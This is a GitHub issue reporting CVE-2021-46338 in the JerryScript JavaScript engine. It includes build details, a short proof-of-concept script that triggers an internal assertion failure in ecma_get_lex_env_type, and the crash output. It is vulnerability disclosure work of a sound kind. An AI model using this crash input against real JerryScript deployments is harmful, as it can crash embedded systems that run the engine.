Headline
CVE-2021-46338: Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma-helpers.c (ecma_get_lex_env_type). · Issue #4900 · jerryscript-project/jerryscript
There is an Assertion 'ecma_is_lexical_environment (object_p)' failed at /base/ecma-helpers.c(ecma_get_lex_env_type) in JerryScript 3.0.0.
JerryScript revision
Commit: 42523bd6
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --linker-flag=-fuse-ld=gold --profile=es2015-subset --stack-limit=20
ASAN closed
Test case
var i = 0; var a = []; var JSEtest = [];
JSEtest.__defineGetter__(0, function NaN() { if (i++ > 2) { return; }
JSEtest.shift(); gc(); a.push(0); a.concat(JSEtest); });
JSEtest[0];
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ecma_is_lexical_environment (object_p)' failed at /home/f1yh0p/jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma_get_lex_env_type):291. Error: ERR_FAILED_INTERNAL_ASSERTION
Credits: Found by OWL337 team.